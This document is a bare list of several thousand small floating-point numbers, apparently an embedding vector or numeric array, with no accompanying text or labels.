0.009661469608545303, 0.0361863374710083, -0.014743106439709663, -0.039126478135585785, 0.012092739343643188, -0.016312122344970703, 0.02394517883658409, -0.02369074337184429, -0.020086245611310005, -0.03878723084926605, -0.013845515437424183, 0.020566845312714577, -0.04381939396262169, 0.001987774856388569, 0.01945015788078308, 0.041755642741918564, -0.007689597085118294, -0.02781824767589569, -0.033274468034505844, 0.027436595410108566, -0.022051049396395683, -0.019690457731485367, 0.0284401997923851, -0.008050046861171722, -0.0343487523496151, -0.00583787402138114, 0.012340107001364231, -0.03754332661628723, -0.01101845782250166, -0.014955135062336922, -0.005452687386423349, -0.036016713827848434, -0.024171343073248863, -0.012029130943119526, -0.033868152648210526, -0.037628136575222015, 0.03471626713871956, 0.010361166670918465, 0.004074497148394585, -0.00625133141875267, 0.004615171812474728, 0.01998729817569256, -0.0016944677336141467, -0.008353956043720245, -0.03980497270822525, -0.0002405207633273676, 0.017004752531647682, 0.058859340846538544, 0.0035037847701460123, 0.0009965378558263183, 0.0036822427064180374, -0.0034719803370535374, -0.02272954396903515, 0.03946572542190552, -0.012552136555314064, -0.05589093267917633, 0.0063926842994987965, 0.04446961730718613, -0.018079034984111786, 0.03570573776960373, -0.04868193343281746, -0.019436022266745567, 0.07163764536380768, -0.028129223734140396, 0.03341582417488098, -0.01717437617480755, 0.007272605784237385, -0.029033882543444633, -0.018700987100601196, -0.0449502170085907, 0.020637521520256996, -0.04051173850893974, 0.005710656754672527, -0.025231489911675453, -0.0333310104906559, -0.022376161068677902, 0.022927438840270042, -0.012205821461975574, -0.003487882437184453, -0.007085313554853201, 0.034405291080474854, -0.018559634685516357, -0.03208710625767708, -0.013075142167508602, 0.034885890781879425, 0.003661039751023054, 0.027252836152911186, 0.014912729151546955, -0.02332322672009468, -0.03191748261451721, 0.004109835252165794, -0.020736468955874443, -0.011484921909868717, -0.024581266567111015, -0.005261861253529787, -0.011541463434696198, -0.046872615814208984, -0.022376161068677902, -0.03070184774696827, 0.00798643846064806, 0.032878682017326355, -0.008170196786522865, 0.040002867579460144, -0.027945466339588165, -0.007208997383713722, -0.05744581297039986, -0.02445404976606369, -0.033020034432411194, 0.026955995708703995, 0.003074425272643566, -0.05914204940199852, -0.009385831654071808, -0.007951099425554276, 0.04054000601172447, 0.0863383412361145, 0.02412893809378147, 0.005551634822040796, -0.01167574804276228, 0.004138105548918247, 0.011152742430567741, -0.017570164054632187, 0.03502724692225456, 0.028977341949939728, -0.005021561402827501, 0.0029118694365024567, 0.012686421163380146, 0.0400594063103199, 0.041359852999448776, -0.029033882543444633, -0.018262792378664017, -0.003972016274929047, -0.0015054082032293081, -0.038730692118406296, -0.023337362334132195, 0.004558630753308535, -0.01571844145655632, -0.033133115619421005, -0.012976194731891155, -0.02788892388343811, -0.04531773552298546, 0.0005397913628257811, -0.035620927810668945, 0.011244622059166431, -0.013894989155232906, -0.022432703524827957, -0.07039373368024826, -0.008000573143362999, 0.013442659750580788, -0.009937107563018799, -0.0011820634827017784, 0.012248227372765541, -0.026546072214841843, -0.004198180511593819, -0.003876602975651622, -0.011944319121539593, 0.020566845312714577, -0.016029417514801025, 0.02821403555572033, 0.03092801198363304, -0.02668742462992668, -0.004922614432871342, -0.006809675134718418, 0.011004322208464146, 0.004431413020938635, 0.007569447159767151, 0.015223706141114235, -0.0718638077378273, 0.019252263009548187, -0.0250760018825531, 0.08079730719327927, 0.028383659198880196, 0.024991190060973167, 0.02182488515973091, -0.007315011695027351, 0.036864832043647766, 0.014156491495668888, -0.018955422565340996, -0.004661111626774073, -0.030786657705903053, -0.011308230459690094, -0.011223419569432735, 0.03019297681748867, 0.017442945390939713, 0.030730117112398148, 0.0010301091242581606, 0.010396504774689674, 0.03983324393630028, -0.0030585231725126505, -0.024100666865706444, 0.07830949872732162, -0.008028844371438026, 0.0019170985324308276, -0.021697668358683586, 0.0010574962943792343, 0.0000037822940157639096, 0.02906215377151966, -0.04133158549666405, 0.047607652842998505, -0.018658580258488655, 0.004767125938087702, -0.014234235510230064, 0.02708321250975132, -0.0037387837655842304, 0.02719629555940628, -0.026673289015889168, 0.025754496455192566, 0.0382218211889267, 0.020595114678144455, -0.025570737197995186, -0.017527757212519646, 0.00392961036413908, 0.023125331848859787, 0.009619063697755337, 0.01619904115796089, -0.006039301864802837, -0.0012598076136782765, -0.011725221760571003, 0.01076402235776186, 0.018587904050946236, -0.0014294310240074992, -0.010106731206178665, 0.006816742941737175, 0.03604498505592346, 0.020453762263059616, -0.007364485412836075, 0.02127360925078392, -0.004470285028219223, 0.0025231491308659315, -0.017527757212519646, 0.004184045363217592, -0.017669111490249634, -0.01376070361584425, 0.038250092417001724, 0.015845658257603645, 0.006367947440594435, -0.005109906662255526, 0.025966525077819824, -0.001236837706528604, -0.02664501965045929, -0.008438766933977604, 0.04096406698226929, -0.01498340629041195, -0.004777727648615837, -0.024439914152026176, 0.041388124227523804, -0.06162985786795616, 0.008693202398717403, -0.013053938746452332, -0.023846231400966644, 0.03644077479839325, -0.01350626815110445, 0.034857623279094696, 0.012212889268994331, -0.02321014367043972, -0.04054000601172447, 0.04356496036052704, 0.013061006553471088, 0.0068132090382277966, 0.0007663976866751909, -0.017881140112876892, 0.01922399178147316, 0.0001267758634639904, -0.05289424955844879, -0.01696234568953514, -0.02328081987798214, -0.008184332400560379, -0.01262988056987524, -0.016905805096030235, -0.016538288444280624, 0.004565698094666004, -0.0001917098561534658, -0.01383137982338667, -0.004067429341375828, -0.01634039357304573, 0.025641413405537605, 0.02010038122534752, -0.022644732147455215, -0.033020034432411194, 0.003532055299729109, 0.021980373188853264, -0.0157467108219862, -0.011011390015482903, 0.013061006553471088, 0.005841407924890518, 0.006537571083754301, 0.019308803603053093, -0.00031031377147883177, -0.02335149608552456, -0.014319047331809998, 0.005081636365503073, -0.004406676162034273, 0.018700987100601196, 0.01553468219935894, 0.02839779481291771, 0.00976041704416275, -0.023408038541674614, 0.0014683031477034092, 0.01244612131267786, 0.01153439562767744, -0.010431842878460884, -0.006389150395989418, -0.010269287042319775, -0.05340312048792839, 0.02097676880657673, 0.011499057523906231, -0.012106874957680702, 0.01892715133726597, -0.0023694278206676245, 0.027903059497475624, 0.0178387351334095, 0.012347174808382988, 0.0380239263176918, -0.016863400116562843, 0.022065185010433197, 0.018474822863936424, -0.0014683031477034092, -0.004459683783352375, 0.021810749545693398, -0.015577088110148907, 0.0013313675299286842, -0.03745851665735245, -0.007710800040513277, 0.004480886273086071, 0.021287744864821434, 0.021075716242194176, 0.030673576518893242, -0.029231777414679527, -0.010467180982232094, 0.007866288535296917, -0.03140861168503761, -0.019351210445165634, -0.013894989155232906, -0.005081636365503073, 0.006685991305857897, 0.018997827544808388, 0.017824599519371986, -0.009491845965385437, -0.03019297681748867, -0.024044126272201538, 0.021542180329561234, 0.011923115700483322, -0.0041027674451470375, 0.037147536873817444, -0.031747858971357346, 0.01634039357304573, -0.020241733640432358, 0.030899740755558014, 0.012304768897593021, 0.021146392449736595, -0.007435161620378494, 0.01460175309330225, 0.002309352857992053, 0.04294300824403763, 0.0016794489929452538, -0.0014630024088546634, 0.009979513473808765, 0.03398123383522034, 0.018997827544808388, -0.018842339515686035, -0.04381939396262169, -0.009258613921701908, -0.011209283955395222, -0.02207932062447071, 0.019252263009548187, 0.008014708757400513, 0.01560535840690136, 0.01689166948199272, -0.004982689395546913, 0.0578981414437294, -0.045996230095624924, 0.021740073338150978, 0.0017077195225283504, -0.014050477184355259, 0.0003063382173422724, -0.021725937724113464, 0.01547814067453146, -0.019068503752350807, 0.03191748261451721, -0.0048484038561582565, -0.02058098092675209, 0.0044738189317286015, -0.034772809594869614, 0.0066541871055960655, 0.006703660823404789, 0.0212029330432415, 0.00341720599681139, 0.0214573685079813, -0.0022174734622240067, -0.0297123771160841, -0.01940775103867054, -0.006074640434235334, 0.011082066223025322, -0.010212746448814869, 0.0253304373472929, 0.005364342126995325, 0.020920226350426674, -0.008749743923544884, 0.009293952025473118, -0.0036645736545324326, -0.013993935659527779, 0.029175234958529472, -0.005095771513879299, 0.022093456238508224, -0.003240515012294054, -0.005148778669536114, 0.002402998972684145, 0.030419141054153442, -0.007958167232573032, 0.02862395904958248, -0.00012854278611484915, -0.024977054446935654, -0.032115377485752106, 0.02496291883289814, 0.009385831654071808, 0.013145818375051022, -0.0057035889476537704, -0.0016087725525721908, -0.013308374211192131, 0.015039946883916855, -0.016425205394625664, 0.00851651094853878, -0.004081564489752054, -0.021513909101486206, -0.032284997403621674, 0.009753349237143993, 0.019761133939027786, 0.03222845867276192, -0.008728540502488613, 0.01195138692855835, -0.003194575197994709, -0.013965665362775326, 0.012933788821101189, 0.00447735283523798, -0.018700987100601196, -0.013477997854351997, 0.02624923177063465, -0.019167451187968254, 0.03915474936366081, -0.020750604569911957, 0.030843200162053108, -0.02247510850429535, 0.016623100265860558, -0.020114514976739883, 0.01590219885110855, 0.002397698350250721, 0.004866072908043861, -0.008177264593541622, 0.0027899525593966246, -0.000888314563781023, 0.021796615794301033, 0.003678708802908659, -0.03443356230854988, 0.007120651658624411, -0.00866493210196495, 0.0008905231952667236, 0.008368090726435184, 0.03530995175242424, 0.001190014649182558, -0.0022139395587146282, 0.00525479344651103, 0.0011378907365724444, 0.0037281822878867388, 0.01919572241604328, 0.024552997201681137, 0.001102552516385913, 0.001483321888372302, -0.0380239263176918, -0.015025812201201916, 0.009230343624949455, -0.01735813356935978, 0.023436307907104492, -0.029514482244849205, -0.021612856537103653, 0.020057974383234978, 0.0005521597340703011, -0.03203056380152702, -0.007618920411914587, -0.021372556686401367, 0.007028772495687008, -0.007519973441958427, -0.006958095822483301, -0.012297701090574265, 0.007449297234416008, -0.03239808231592178, -0.007442229427397251, 0.0065976460464298725, 0.003228146582841873, 0.017117833718657494, -0.011590936221182346, -0.03533822298049927, 0.011668681167066097, 0.03494243323802948, -0.005396146327257156, 0.050349898636341095, -0.0328221395611763, -0.03491416200995445, -0.027874788269400597, -0.025358708575367928, -0.006498699076473713, 0.0019206323195248842, -0.010735752061009407, -0.018771663308143616, 0.028609823435544968, -0.019322939217090607, -0.04506330192089081, -0.025599008426070213, -0.033755067735910416, -0.03092801198363304, 0.0038235955871641636, -0.0030108164064586163, 0.0034578449558466673, -0.015619494020938873, 0.024468185380101204, 0.013803109526634216, -0.016608964651823044, 0.01813557557761669, 0.016792722046375275, -0.020496169105172157, 0.007463432382792234, -0.004551562946289778, -0.00024979704176075757, 0.0053784772753715515, 0.0034013038966804743, 0.004304195288568735, 0.005124042276293039, -0.023337362334132195, -0.04020076245069504, 0.016241446137428284, 0.015958741307258606, 0.007018170785158873, -0.005710656754672527, -0.02360593155026436, -0.012205821461975574, -0.021980373188853264, 0.010460113175213337, 0.008332752622663975, 0.019026098772883415, -0.012509730644524097, 0.018771663308143616, 0.032737329602241516, -0.024765025824308395, -0.02222067303955555, -0.03290695324540138, -0.004042692482471466, -0.029033882543444633, -0.028680501505732536, -0.021174661815166473, -0.00009613100701244548, 0.019421886652708054, -0.015520546585321426, -0.009901769459247589, 0.008361022919416428, 0.013407321646809578, -0.030617035925388336, -0.014488670974969864, 0.036384232342243195, -0.017089564353227615, -0.0219662394374609, -0.02682877704501152, 0.02353525534272194, -0.011378907598555088, 0.006035768426954746, -0.022093456238508224, 0.004558630753308535, 0.010361166670918465, 0.008042979054152966, 0.004784794989973307, -0.010997254401445389, 0.009329290129244328, 0.01447453536093235, -0.035875361412763596, -0.016792722046375275, -0.01069334615021944, -0.02113225683569908, 0.00028579786885529757, 0.011032592505216599, 0.025358708575367928, 0.014926864765584469, 0.02466607838869095, 0.010064325295388699, -0.004060361534357071, -0.003551491303369403, -0.020453762263059616, 0.04127504304051399, -0.028977341949939728, 0.010615602135658264, 0.010233948938548565, -0.00015824897855054587, -0.02244683913886547, -0.010170340538024902, -0.008855758234858513, -0.03367025777697563, -0.033868152648210526, 0.0050604334101080894, 0.008459970355033875, -0.03253943473100662, -0.008339820429682732, -0.018587904050946236, -0.011633342131972313, -0.00335359713062644, 0.000921444152481854, 0.027224566787481308, -0.021909696981310844, 0.01896955817937851, -0.00792989693582058, 0.03841971606016159, 0.019534969702363014, 0.0035938972141593695, -0.004569231998175383, 0.025316301733255386, -0.024623673409223557, -0.005781332962214947, -0.019817674532532692, -0.0057035889476537704, 0.03678002208471298, -0.02518908493220806, -0.002539051230996847, 0.018008356913924217, 0.029542753472924232, 0.015308517962694168, 0.027874788269400597, -0.016283852979540825, 0.02431269735097885, -0.01195138692855835, -0.006488097365945578, 0.0047812615521252155, 0.0286946352571249, -0.011039660312235355, -0.0023217210546135902, 0.014142355881631374, 0.007216064725071192, -0.009675605222582817, 0.01802249252796173, -0.0038801366463303566, -0.018262792378664017, -0.0341508574783802, 0.000500919297337532, -0.0006665671826340258, -0.03745851665735245, -0.023082926869392395, 0.02219240367412567, 0.026842912659049034, -0.008255008608102798, 0.035762280225753784, 0.024552997201681137, 0.02053857408463955, -0.004335999954491854, 0.009816957637667656, 0.021626992151141167, 0.0008666698704473674, 0.007378620561212301, -0.013371982611715794, 0.00586614478379488, -0.00477065984159708, -0.004162842407822609, -0.033274468034505844, -0.008820420131087303, -0.021937968209385872, -0.003749385243281722, 0.030730117112398148, -0.01279243640601635, -0.0007102982490323484, -0.002998448209837079, 0.005311334505677223, 0.020750604569911957, -0.006375015247613192, -0.0021079250145703554, 0.0021662330254912376, -0.005721257999539375, 0.011654545553028584, 0.0022157065104693174, 0.008382226340472698, 0.025754496455192566, -0.005791934672743082, -0.004777727648615837, 0.003502017818391323, 0.007071177940815687, -0.0068132090382277966, 0.0037847235798835754, -0.0021397292148321867, -0.009315155446529388, 0.0035179199185222387, 0.026630884036421776, -0.0007270838832482696, -0.003590363310649991, -0.003111530328169465, 0.007887491025030613, -0.02781824767589569, -0.00002241768379462883, 0.04794690012931824, -0.018616175279021263, 0.02097676880657673, -0.0157467108219862, 0.03884377330541611, -0.004318330902606249, 0.00689802085980773, -0.03268078714609146, -0.02832711860537529, -0.031238988041877747, -0.013902056030929089, 0.020482033491134644, 0.020340681076049805, 0.021358421072363853, 0.018997827544808388, 0.029429670423269272, 0.004692915827035904, 0.014502806589007378, -0.028312982991337776, -0.02627750113606453, 0.005590506829321384, -0.006742532830685377, -0.02581103704869747, 0.0010857668239623308, -0.012403715401887894, 0.03460318595170975, -0.0015098254662007093, 0.016100093722343445, -0.016580693423748016, 0.016976481303572655, -0.03952226787805557, -0.0029807789251208305, -0.0012333039194345474, 0.04093579575419426, 0.009590793401002884, 0.01940775103867054, -0.019563239067792892, -0.004756524693220854, 0.017499487847089767, -0.009315155446529388, -0.02039722166955471, -0.005272462498396635, 0.02079300954937935, -0.04152947664260864, -0.008000573143362999, 0.000434439250966534, 0.013174088671803474, -0.04328225553035736, -0.024878108873963356, 0.014969270676374435, 0.047466300427913666, 0.01260867714881897, -0.004982689395546913, -0.005883813835680485, -0.013739500194787979, -0.014516941271722317, 0.004972087685018778, -0.0032687855418771505, -0.002641532104462385, -0.026235096156597137, 0.024171343073248863, -0.017188511788845062, 0.0036257016472518444, 0.0053325374610722065, -0.0006272534374147654, -0.026927724480628967, 0.0239027738571167, 0.003411905374377966, -0.004777727648615837, -0.012672286480665207, -0.0008710871334187686, -0.00773907033726573, -0.015760846436023712, 0.0010760488221421838, -0.01085590198636055, -0.013124615885317326, -0.005544567015022039, 0.0030108164064586163, -0.00003379217378096655, 0.000034730845072772354, 0.002793486462906003, 0.001016857335343957, 0.0270125363022089, -0.024355102330446243, 0.011237554252147675, 0.006590578239411116, -0.0012995630968362093, -0.026842912659049034, -0.03203056380152702, 0.00020109656907152385, -0.006590578239411116, -0.0022086389362812042, 0.01392325945198536, -0.022305484861135483, -0.025386977940797806, 0.009520117193460464, -0.015308517962694168, -0.0033942360896617174, 0.010502519086003304, -0.007689597085118294, -0.012877248227596283, 0.02277195081114769, 0.009392899461090565, -0.014022205956280231, -0.012219957076013088, -0.01820625178515911, -0.0005777798942290246, 0.11144261807203293, -0.000052952116675442085, -0.01604355312883854, -0.017485352233052254, 0.005226523149758577, 0.00644215801730752, 0.03519686684012413, -0.0006957212463021278, 0.024256154894828796, -0.0061241136863827705, 0.021655261516571045, -0.020708197727799416, 0.027139754965901375, 0.004141639452427626, -0.004208782222121954, 0.03694964572787285, -0.01995902694761753, -0.013025668449699879, 0.009399967268109322, -0.007141854614019394, -0.005420883186161518, 0.005039230454713106, -0.0066541871055960655, -0.0027334115002304316, 0.0015699005452916026, 0.01422009989619255, -0.006968697067350149, -0.01369002740830183, 0.0048943436704576015, -0.012622812762856483, 0.0017024187836796045, -0.0009046584600582719, -0.014375588856637478, -0.020962633192539215, 0.03553611412644386, 0.003279387019574642, 0.00785922072827816, -0.015987010672688484, 0.018177980557084084, 0.003556791925802827, -0.012057401239871979, 0.00441374396905303, 0.020156921818852425, 0.0439324788749218, -0.027691030874848366, -0.028454335406422615, 0.005834340583533049, 0.0014603519812226295, -0.031267259269952774, -0.003911941312253475, 0.0006016332190483809, -0.010679210536181927, -0.0017536592204123735, 0.01634039357304573, -0.02620682492852211, 0.013265968300402164, -0.01547814067453146, -0.008926434442400932, 0.020453762263059616, -0.028496742248535156, -0.008785082027316093, 0.019605645909905434, -0.01892715133726597, -0.016623100265860558, 0.012933788821101189, 0.003311191452667117, -0.031125904992222786, -0.007085313554853201, -0.020156921818852425, 0.00785922072827816, 0.03457491472363472, 0.0008944987202994525, -0.015760846436023712, 0.013223562389612198, 0.02562727779150009, -0.006258399225771427, -0.011541463434696198, 0.013237698003649712, -0.013894989155232906, -0.032624244689941406, 0.008438766933977604, 0.008530646562576294, -0.029429670423269272, 0.008813352324068546, 0.0019559706561267376, -0.007809747010469437, -0.004470285028219223, -0.017202645540237427, 0.03381161019206047, -0.006912156008183956, 0.005159380380064249, 0.00670719426125288, 0.007760273292660713, 0.010347031056880951, 0.007979370653629303, -0.0006299038068391383, 0.0027528475038707256, 0.02493464946746826, -0.013838447630405426, 0.0025355173274874687, -0.014630023390054703, 0.014941000379621983, 0.011287027969956398, 0.007979370653629303, -0.018107304349541664, -0.013647621497511864, 0.03805219754576683, -0.007060576695948839, -0.017273323610424995, 0.011067930608987808, -0.035988446325063705, -0.0018888278864324093, -0.009053652174770832, -0.012000859715044498, -0.015619494020938873, 0.006618849001824856, 0.017640840262174606, -0.009301019832491875, 0.004169910214841366, -0.02459540218114853, -0.018446551635861397, 0.00020827465050388128, -0.014184761792421341, 0.010368234477937222, 0.007710800040513277, -0.022376161068677902, -0.003572694258764386, 0.005940354894846678, 0.017457081004977226, 0.012106874957680702, 0.004053294192999601, 0.02350698411464691, 0.015435734763741493, 0.02035481482744217, -0.0022916835732758045, -0.011074998416006565, 0.017245052382349968, 0.005809603724628687, 0.01593047007918358, 0.00853771436959505, -0.004957952536642551, 0.029882000759243965, 0.00589441554620862, -0.0178387351334095, 0.012361309491097927, -0.024256154894828796, -0.0051735155284404755, -0.013110480271279812, 0.0020973235368728638, 0.023309091106057167, -0.009534251876175404, -0.010905374772846699, -0.009873499162495136, -0.012057401239871979, -0.01277123298496008, -0.005615243222564459, 0.014799647033214569, -0.0228850319981575, -0.0059085506945848465, -0.006360880099236965, 0.027210431173443794, 0.013569877482950687, 0.03296349197626114, 0.010997254401445389, -0.014255438931286335, 0.01954910345375538, -0.019167451187968254, -0.017089564353227615, -0.019238127395510674, 0.0078733554109931, 0.01805076375603676, 0.014630023390054703, -0.008671999908983707, 0.020863685756921768, 0.007307944353669882, 0.023309091106057167, 0.010792292654514313, -0.004053294192999601, 0.024326831102371216, 0.0003869535285048187, -0.014771376736462116, -0.01528024673461914, 0.0341508574783802, 0.0030585231725126505, 0.00848117284476757, 0.014714835211634636, 0.01434731762856245, 0.005314868409186602, -0.04642028734087944, 0.022786084562540054, 0.0012712925672531128, 0.021542180329561234, 0.01892715133726597, 0.007307944353669882, 0.017188511788845062, 0.007717867381870747, -0.020001433789730072, 0.000217219625483267, 0.0031026958022266626, -0.00035117357037961483, 0.004565698094666004, -0.02251751534640789, 0.0014850887237116694, -0.005611709784716368, -0.003798858728259802, -0.02182488515973091, 0.014064611867070198, -0.023478714749217033, -0.0005207970389164984, -0.00013638344535138458, 0.008092452771961689, -0.0253304373472929, 0.002155631547793746, -0.012064469046890736, 0.015520546585321426, 0.003214011201635003, 0.009569589979946613, -0.017386404797434807, -0.0036009647883474827, -0.012658150866627693, 0.019831810146570206, 0.015732577070593834, 0.0027387121226638556, 0.027252836152911186, 0.03352890536189079, -0.0250760018825531, 0.019619781523942947, -0.012368377298116684, 0.027097348123788834, 0.019322939217090607, 0.017273323610424995, -0.0037034456618130207, -0.005848475731909275, 0.021768344566226006, -0.009498913772404194, -0.011244622059166431, 0.013280103914439678, 0.02427029050886631, 0.004007354378700256, -0.01528024673461914, 0.003023184835910797, 0.009824025444686413, -0.0014382656663656235, 0.010756954550743103, -0.024439914152026176, -0.00005267603773972951, -0.0016971180448308587, -0.004127504304051399, -0.016976481303572655, 0.030871469527482986, 0.007067644502967596, 0.0003284245904069394, 0.01634039357304573, 0.0024754423648118973, -0.027281107380986214, 0.0024383373092859983, -0.0038942720275372267, 0.01166161336004734, 0.009046584367752075, -0.012940856628119946, 0.013732433319091797, 0.0016167236026376486, 0.006975764874368906, -0.007244335487484932, -0.018686851486563683, 0.03785430267453194, -0.00686268275603652, -0.015011676587164402, -0.011244622059166431, 0.013103412464261055, -0.008558916859328747, 0.0001901638024719432, 0.016693776473402977, -0.004604570101946592, -0.006240729708224535, 0.01735813356935978, -0.006714262068271637, -0.0233939029276371, 0.014425061643123627, -0.007392756175249815, 0.007972302846610546, 0.0382218211889267, -0.01092657819390297, -0.030899740755558014, 0.01728745736181736, 0.005184117238968611, -0.02909042313694954, 0.00043973998981527984, 0.028737042099237442, 0.005608175881206989, -0.007696664426475763, 0.014099949970841408, 0.015068218111991882, -0.0006758435047231615, 0.004714118782430887, 0.009258613921701908, -0.0007628638413734734, 0.029514482244849205, -0.037515055388212204, -0.01354160625487566, -0.0006771686603315175, -0.006145316641777754, 0.011598004028201103, 0.011011390015482903, -0.009767484851181507, -0.001667080563493073, -0.00944944005459547, -0.027874788269400597, -0.009223275817930698, -0.013781906105577946, -0.0032246126793324947, -0.0012545068748295307, -0.017372269183397293, 0.011357704177498817, -0.006774337030947208, -0.010092596523463726, 0.0032988230232149363, 0.0255848728120327, 0.017315728589892387, 0.014375588856637478, -0.006014565471559763, -0.018630310893058777, 0.00336773251183331, -0.0028464938513934612, -0.014333182945847511, 0.014297844842076302, 0.00867906678467989, -0.00977455172687769, 0.0002372078160988167, 0.012156348675489426, -0.009569589979946613, 0.01721678115427494, -0.018587904050946236, -0.008855758234858513, -0.015817388892173767, -0.046363744884729385, 0.005604641977697611, 0.00320694362744689, -0.0328221395611763, -0.004915546625852585, -0.020807145163416862, 0.026037201285362244, -0.0026698026340454817, -0.02141496166586876, -0.029995081946253777, 0.01058026310056448, 0.03731716051697731, 0.010608534328639507, -0.013711229898035526, 0.0035550249740481377, -0.03330273926258087, 0.024694349616765976, 0.014135289005935192, 0.0019754066597670317, -0.01696234568953514, -0.004127504304051399, -0.014516941271722317, 0.03392469137907028, 0.008855758234858513, 0.013075142167508602, -0.014361453242599964, 0.013350780121982098, -0.03542303293943405, -0.0012545068748295307, 0.004767125938087702, -0.00022704807633999735, 0.0011953153880313039, -0.0018128508236259222, -0.000513287668582052, -0.00866493210196495, 0.00867906678467989, 0.002742246026173234, -0.03581882268190384, -0.013774839229881763, -0.004067429341375828, 0.027281107380986214, 0.024906378239393234, -0.0005177049315534532, -0.0063467444851994514, 0.02434096671640873, -0.01370416209101677, -0.019096774980425835, -0.011400110088288784, 0.02613614872097969, -0.012651083059608936, 0.02588171325623989, -0.009979513473808765, 0.006014565471559763, -0.0029083355329930782, 0.009195005521178246, -0.012333039194345474, 0.023111196234822273, -0.0027722835075110197, 0.026673289015889168, -0.010997254401445389, 0.019464291632175446, 0.018686851486563683, -0.0022157065104693174, -0.007922829128801823, -0.0002796136832330376, 0.014813782647252083, 0.013456794433295727, 0.011499057523906231, 0.010714548639953136, 0.004240586422383785, 0.019648050889372826, 0.016283852979540825, -0.04670299217104912, 0.01740054041147232, -0.0005101955612190068, 0.00866493210196495, 0.011371839791536331, 0.018884746357798576, -0.013280103914439678, 0.0003677383647300303, 0.003208710579201579, -0.011025524698197842, -0.00386600149795413, -0.00144179945345968, 0.036610398441553116, -0.00531840231269598, -0.015520546585321426, -0.018333468586206436, 0.0023941644467413425, 0.017527757212519646, -0.03321792930364609, -0.0052653951570391655, -0.0178387351334095, -0.028779447078704834, 0.021513909101486206, -0.011739357374608517, 0.006738998927175999, 0.030730117112398148, 0.03019297681748867, 0.027238700538873672, 0.018616175279021263, 0.0048943436704576015, 0.0019736397080123425, -0.009152599610388279, -0.013428524136543274, 0.0026238630525767803, -0.015082352794706821, -0.015916334465146065, 0.012241159565746784, -0.006035768426954746, -0.01547814067453146, 0.02657434344291687, 0.016100093722343445, -0.0010742819868028164, -0.010170340538024902, 0.020807145163416862, 0.014354385435581207, 0.003282920690253377, -0.008184332400560379, 0.00992297288030386, 0.006332609336823225, 0.02295570820569992, 0.0006749600288458169, -0.0013781905872747302, 0.0035461904481053352, -0.01270055677741766, -0.002966643776744604, -0.007512906100600958, -0.023309091106057167, 0.005611709784716368, 0.028369523584842682, 0.014149423688650131, -0.016368664801120758, 0.005251259543001652, 0.01272176019847393, 0.009626131504774094, 0.014630023390054703, 0.010325828567147255, 0.007378620561212301, 0.02412893809378147, -0.0003951254766434431, -0.02887839451432228, -0.002671569585800171, -0.004558630753308535, 0.015393328852951527, 0.02624923177063465, 0.01070748083293438, -0.011336501687765121, 0.011718153953552246, 0.006247797515243292, 0.03203056380152702, 0.003380100941285491, -0.012806571088731289, 0.0054244170896708965, -0.00814899429678917, 0.012799504213035107, 0.010792292654514313, -0.02272954396903515, 0.0002103728475049138, 0.012354242615401745, 0.0009894701652228832, 0.0067566679790616035, 0.020199326798319817, 0.03245462104678154, -0.0022863829508423805, -0.020057974383234978, -0.0034136720933020115, -0.00535374041646719, 0.0036257016472518444, -0.0018048996571451426, 0.02025586925446987, -0.012022063136100769, -0.003830663161352277, 0.014771376736462116, -0.008961772546172142, 0.009534251876175404, -0.005466823000460863, 0.01498340629041195, 0.012750030495226383, -0.015110623091459274, 0.019973162561655045, -0.00895470567047596, 0.011421313509345055, 0.0020990902557969093, 0.0052653951570391655, -0.0007200162508524954, 0.0016317423433065414, -0.005396146327257156, -0.020694062113761902, 0.001009789644740522, 0.015888065099716187, 0.001109620206989348, 0.0010415940778329968, -0.010177407413721085, 0.0061241136863827705, 0.01282777450978756, 0.01560535840690136, 0.0022545785177499056, -0.04531773552298546, -0.0063467444851994514, 0.004328932147473097, -0.005028628744184971, 0.0011361237848177552, 0.018913015723228455, 0.023775555193424225, 0.021626992151141167, -0.017556028440594673, -0.018799934536218643, 0.032878682017326355, 0.0008852224564179778, -0.0072867413982748985, 0.021584585309028625, 0.0033394619822502136, -0.0239027738571167, 0.004275924991816282, 0.0019347675843164325, -0.022164132446050644, 0.010551992803812027, -0.004078030586242676, -0.0026892386376857758, -0.0031221318058669567, -0.013428524136543274, -0.010163272731006145, -0.019619781523942947, 0.002915403340011835, 0.009824025444686413, 0.01995902694761753, 0.022927438840270042, 0.0037529191467911005, -0.021923832595348358, 0.02251751534640789, -0.00477065984159708, 0.012311836704611778, 0.02872290648519993, 0.003604498691856861, -0.001495690201409161, 0.006435090210288763, 0.004947350826114416, -0.013626418076455593, 0.011173945851624012, -0.0064951651729643345, 0.015548817813396454, -0.026178553700447083, 0.005442086141556501, 0.0015645998064428568, 0.02025586925446987, -0.003099162131547928, -0.008361022919416428, -0.029542753472924232, -0.010997254401445389, 0.004544495139271021, -0.006954561918973923, 0.014502806589007378, -0.03966362029314041, 0.015237840823829174, 0.009209140203893185, 0.01922399178147316, -0.007979370653629303, -0.002341157291084528, -0.001906497054733336, -0.016467610374093056, 0.007134786807000637, -0.0023058189544826746, 0.008113655261695385, 0.002383562969043851, 0.011470786295831203, 0.012509730644524097, -0.01802249252796173, 0.008580120280385017, -0.021626992151141167, 0.01467242930084467, 0.014615888707339764, -0.010332896374166012, -0.014827917329967022, -0.008530646562576294, 0.019308803603053093, 0.008255008608102798, -0.012354242615401745, -0.013336644507944584, 0.028355389833450317, 0.01264401525259018, 0.00679907388985157, -0.007148922421038151, -0.01498340629041195, -0.0058060698211193085, 0.006064038723707199, -0.007060576695948839, -0.03389642387628555, 0.01714610494673252, 0.0013958597555756569, 0.009195005521178246, 0.014644159004092216, -0.021372556686401367, 0.011103269644081593, 0.033755067735910416, -0.008028844371438026, 0.00293307239189744, -0.0030761922243982553, 0.008622526191174984, 0.0027510805521160364, 0.024722618982195854, -0.0030956282280385494, -0.004184045363217592, -0.01922399178147316, -0.008438766933977604, 0.026334043592214584, -0.02222067303955555, -0.024581266567111015, -0.024114802479743958, -0.022757815197110176, -0.022786084562540054, 0.011866575106978416, -0.0025337503757327795, -0.01553468219935894, 0.00108753377571702, 0.01754189282655716, 0.02475089021027088, -0.002915403340011835, -0.001364055322483182, -0.02774757146835327, -0.012509730644524097, -0.0055268979631364346, -0.006714262068271637, 0.011301163583993912, 0.013612283393740654, 0.005615243222564459, 0.03166304528713226, 0.004198180511593819, 0.02203691564500332, 0.02909042313694954, -0.006162985693663359, 0.019817674532532692, 0.009908837266266346, 0.00796523503959179, 0.022503379732370377, -0.00567531818524003, 0.013188224285840988, -0.009986581280827522, -0.011421313509345055, -0.021725937724113464, -0.017852868884801865, -0.012898450717329979, 0.01076402235776186, -0.024044126272201538, -0.01714610494673252, -0.004537427797913551, 0.011435448192059994, 0.008763878606259823, 